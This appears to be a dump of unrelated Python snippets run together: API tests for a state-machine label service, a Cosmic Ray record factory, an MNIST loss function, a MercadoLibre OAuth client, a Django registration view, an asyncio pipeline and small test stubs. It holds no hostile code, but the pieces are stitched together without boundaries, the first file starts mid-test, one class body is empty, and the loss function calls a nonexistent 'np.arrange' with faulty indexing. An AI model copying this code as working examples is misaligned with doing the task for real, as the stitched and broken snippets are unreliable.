create_label('foo', 'test_machine', {'bar': 'baz'}) response = client.get('/state-machines/test_machine/labels/foo') assert response.status_code == 200 assert response.json['metadata'] == {'bar': 'baz'} def test_get_label_has_state(client, create_label): create_label('foo', 'test_machine', {'bar': 'baz'}) response = client.get('/state-machines/test_machine/labels/foo') assert response.status_code == 200 assert response.json['state'] == 'start' def test_get_label_404_for_not_found_label(client, create_label): response = client.get('/state-machines/test_machine/labels/foo') assert response.status_code == 404 def test_get_label_404_for_not_found_state_machine(client, create_label): create_label('foo', 'test_machine', {'bar': 'baz'}) response = client.get('/state-machines/nonexistent_machine/labels/foo') assert response.status_code == 404 def test_list_labels_404_for_not_found_state_machine(client, create_label): response = client.get('/state-machines/nonexistent_machine/labels') assert response.status_code == 404 def test_list_labels_when_none(client, create_label): response = client.get('/state-machines/test_machine/labels') assert response.status_code == 200 assert response.json['labels'] == [] def test_list_labels_includes_link_to_create_labels(client, create_label): response = client.get('/state-machines/test_machine/labels') assert response.status_code == 200 assert ( response.json['create'] == '/state-machines/test_machine/labels/:name' ) def test_list_labels_when_one(client, create_label): create_label('foo', 'test_machine', {'bar': 'baz'}) response = client.get('/state-machines/test_machine/labels') assert response.status_code == 200 assert response.json['labels'] == [{'name': 'foo'}] def test_list_labels_when_many(client, create_label): create_label('foo', 'test_machine', {'bar': 'baz'}) create_label('quox', 'test_machine', {'spam': 'ham'}) response = client.get('/state-machines/test_machine/labels') assert response.status_code == 200 # Always returned in alphabetical order assert response.json['labels'] == [{'name': 'foo'}, {'name': 'quox'}] def test_update_label_moves_label(client, create_label, app, mock_webhook, mock_test_feed, current_state): label = create_label('foo', 'test_machine', {}) with mock_webhook() as webhook, mock_test_feed(): response = client.patch( '/state-machines/test_machine/labels/foo', data=json.dumps({'metadata': {'should_progress': True}}), content_type='application/json', ) webhook.assert_called_once() assert response.status_code == 200 assert response.json['metadata'] == {'should_progress': True} assert current_state(label) == 'end' def test_delete_existing_label(client, app, create_label): label_name = 'foo' state_machine = app.config.state_machines['test_machine'] create_label(label_name, state_machine.name, {'bar': 'baz'}) response = client.delete( f'/state-machines/{state_machine.name}/labels/{label_name}', content_type='application/json', ) assert response.status_code == 204 with app.new_session(): label = app.session.query(Label).one() assert label.name == label_name assert label.state_machine == state_machine.name assert label.metadata == {} history = app.session.query(History).order_by( History.id.desc(), ).first() assert history is not None assert history.label_name == label_name assert history.old_state == state_machine.states[0].name assert history.new_state is None def test_delete_non_existent_label(client, app): # When deleting a non-existent label, we do nothing. response = client.delete( f'/state-machines/test_machine/labels/foo', content_type='application/json', ) assert response.status_code == 204 with app.new_session(): assert app.session.query(Label).count() == 0 assert app.session.query(History).count() == 0 def test_delete_label_404_for_not_found_state_machine(client): response = client.delete( '/state-machines/nonexistent_machine/labels/foo', content_type='application/json', ) assert response.status_code == 404 def test_list_labels_excludes_deleted_labels( client, create_label, create_deleted_label, app, ): create_deleted_label('foo', 'test_machine') create_label('quox', 'test_machine', {'spam': 'ham'}) response = client.get('/state-machines/test_machine/labels') assert response.status_code == 200 assert response.json['labels'] == [{'name': 'quox'}] def test_get_label_410_for_deleted_label( client, create_deleted_label, app, ): create_deleted_label('foo', 'test_machine') response = client.get('/state-machines/test_machine/labels/foo') assert response.status_code == 410 def test_create_label_409_for_deleted_label(client, create_label): create_label('foo', 'test_machine', {}) response = client.post( '/state-machines/test_machine/labels/foo', data=json.dumps({'metadata': {}}), content_type='application/json', ) assert response.status_code == 409 def test_update_label_410_for_deleted_label( client, create_deleted_label, app, ): create_deleted_label('foo', 'test_machine') response = client.patch( '/state-machines/test_machine/labels/foo', data=json.dumps({'metadata': {'foo': 'bar'}}), content_type='application/json', ) assert response.status_code == 410
nilq/baby-python
python
"""A `WorkItem` carries information about potential and completed work in the Cosmic Ray system. `WorkItem` is one of the central structures in CR. It can describe both work to be done and work that has been done, and it indicates how test sessions have completed. """ def make_record(name, fields=(), docstring=""): """Create a new record class. A Record is fundamentally a dict with a specified set of keys. These keys will always have a value (defaulting to None), they can't be removed, and new keys can not be added. This may sound a lot like a class, and that's true. The main benefit of records is that they can be treated directly like dicts for the most part, and, critically, they are easy to JSON-ify. Also, like classes, they ensure that they're only used in the correct way, i.e. users can only access the specified fields. This prevents the confusion of using simple dicts where people can use conflicting or confusing key names. Args: name: The name of the class to be created. fields: The names of the fields in the record. docstring: The docstring for the record class. Returns: A new class derived from dict with the specified fields. """ def __init__(self, vals=None, **kwargs): dict.__init__(self, dict.fromkeys(fields)) values = vals or dict() kwargs.update(values) for key, value in kwargs.items(): self[key] = value def __getattr__(self, name): try: return self[name] except KeyError: raise AttributeError('no attribute {}'.format(name)) def __setattr__(self, name, value): try: self[name] = value except KeyError: raise AttributeError('no attribute {}'.format(name)) def __getitem__(self, name): if name not in self: raise KeyError('no field {} in record'.format(name)) return dict.__getitem__(self, name) def __setitem__(self, name, value): if name not in self: raise KeyError('no field {} in record'.format(name)) dict.__setitem__(self, name, value) def __delitem__(self, name): # pylint: disable=unused-argument msg = 'record does not support deleting fields: {}'.format(name) raise KeyError(msg) def update(self, container): """Add all key-value pairs from `container` into this record. If there are duplicate keys, those in `container` will overwrite those here. """ for key, values in container.items(): self[key] = values attrs = { '__init__': __init__, '__getattr__': __getattr__, '__setattr__': __setattr__, '__getitem__': __getitem__, '__setitem__': __setitem__, '__delitem__': __delitem__, 'update': update } rec = type(name, (dict,), attrs) rec.__doc__ = docstring return rec WorkItem = make_record( # pylint: disable=invalid-name 'WorkItem', [ # Arbitrary data returned by the concrete TestRunner to provide more # information about the test results. 'data', # A test_runner.TestOutcome from the test run. 'test_outcome', # A worker.WorkOutcome describing how the worker completed. 'worker_outcome', # The diff produced by the operators 'diff', # the module to be mutated 'module', # The name of the operators 'operator', # The occurrence on which the operator was applied. 'occurrence', # The line number at which the operator was applied. 'line_number', 'command_line', 'job_id' ], docstring=" The details of a specific mutation and test run in CosmicRay." )
nilq/baby-python
python
import sys, os sys.path.append(os.pardir) import numpy as np from dataset.mnist import load_mnist (x_train, t_train), (x_test, t_test) = \ load_mnist(normalize=True, one_hot_label=True) train_size = x_train.shape[0] batch_size = 10 batch_mask = np.random.choice(train_size, batch_size) x_batch = x_train[batch_mask] t_batch = t_train[batch_mask] def cross_entropy_error(y, t): if y.ndim == 1: t = t.reshape(1, t.size) y = y.reshape(1, y.size) batch_size = y.shape[0] return -np.sum(t * np.log(y[np.arrange(batch_size), t])) / batch_size
nilq/baby-python
python
import requests from src.mercadolibre.OAuth import OAuth from src.mercadolibre.enums import paths from src.mercadolibre.enums.HttpMethods import HttpMethods class Client: def __init__(self, access_token=None, refresh_token=None): self.access_token = access_token self.refresh_token = refresh_token self.method = HttpMethods.GET self.url = '' self.headers = None self.query_params = None self.request_params = None self.is_search = False self.object_name = None self.response_data_list = [] def request(self, method=HttpMethods.GET, path=None, query_params=None, data=None): self.method = method self.url = f'{paths.BASE_URL}{path}' self.query_params = query_params self.data = data response = self.__submit_request() error = None tokens = None if not isinstance(response.json(), list): error = response.json().get('error') if (error == 'invalid_grant' or error == 'not_found') and self.access_token: tokens = self.__refresh_token() response = self.__submit_request() return response, tokens def __submit_request(self): self.__set_headers() response = requests.request(method=self.method, url=self.url, headers=self.headers, params=self.query_params, json=self.data) return response def __set_headers(self): if self.access_token: self.headers = {'Authorization': f'Bearer {self.access_token}'} def __refresh_token(self): response = OAuth().refresh_token(refresh_token=self.refresh_token) response_json = response.json() self.access_token = response_json.get('access_token') return {'access_token': self.access_token, 'refresh_token': response_json.get('refresh_token')}
nilq/baby-python
python
from django.shortcuts import render, redirect from django.contrib.auth.forms import UserCreationForm from django.contrib import messages # Create your views here. def register(request): if request.method == 'POST': form = UserCreationForm(request.POST) if form.is_valid(): username = form.cleaned_data.get('username') messages.success(request,f'Account created for {username}!') return redirect('blog-home') else: form = UserCreationForm() return render(request,'users/register.html',{'form':form})
nilq/baby-python
python
"""""" __all__ = ['Pipeline'] # Standard library modules. import asyncio # Third party modules. from loguru import logger import tqdm # Local modules. # Globals and constants variables. class Pipeline: def __init__(self, tasks, stop_on_failure=False): self.tasks = tuple(tasks) self.stop_on_failure = stop_on_failure async def run(self, progress=True): """ Runs the *inputdata* through the pipeline. """ success_tasks = [] it = enumerate(self.tasks) if progress: it = tqdm.tqdm(it, total=len(self.tasks)) for i, task in it: task_name = task.name if progress: it.set_description(task_name) logger.debug('Running task #{}: {}', i, task_name) # Run task. try: success = await task.run(progress=progress) except: logger.exception('Task #{} failed: {}', i, task_name) success = False if self.stop_on_failure: raise if success: success_tasks.append(task) logger.debug('Task #{} succeeded: {}', i, task_name) else: logger.debug('Task #{} skipped: {}', i, task_name) return success_tasks
nilq/baby-python
python
class Solution: def maxIncreaseKeepingSkyline(self, grid: List[List[int]]) -> int:
nilq/baby-python
python
#!/usr/bin/env python # import os, unittest here = os.path.abspath(os.path.dirname(__file__)) class TestCase(unittest.TestCase): def test(self): "neutron_storage: no neutron saved" workdir = 'NeutronStorage-zero-neutrons' saved = os.path.abspath('.') os.chdir(workdir) if os.system('bash test.sh'): raise RuntimeError("Failed") return pass # end of TestCase if __name__ == "__main__": unittest.main() # End of file
nilq/baby-python
python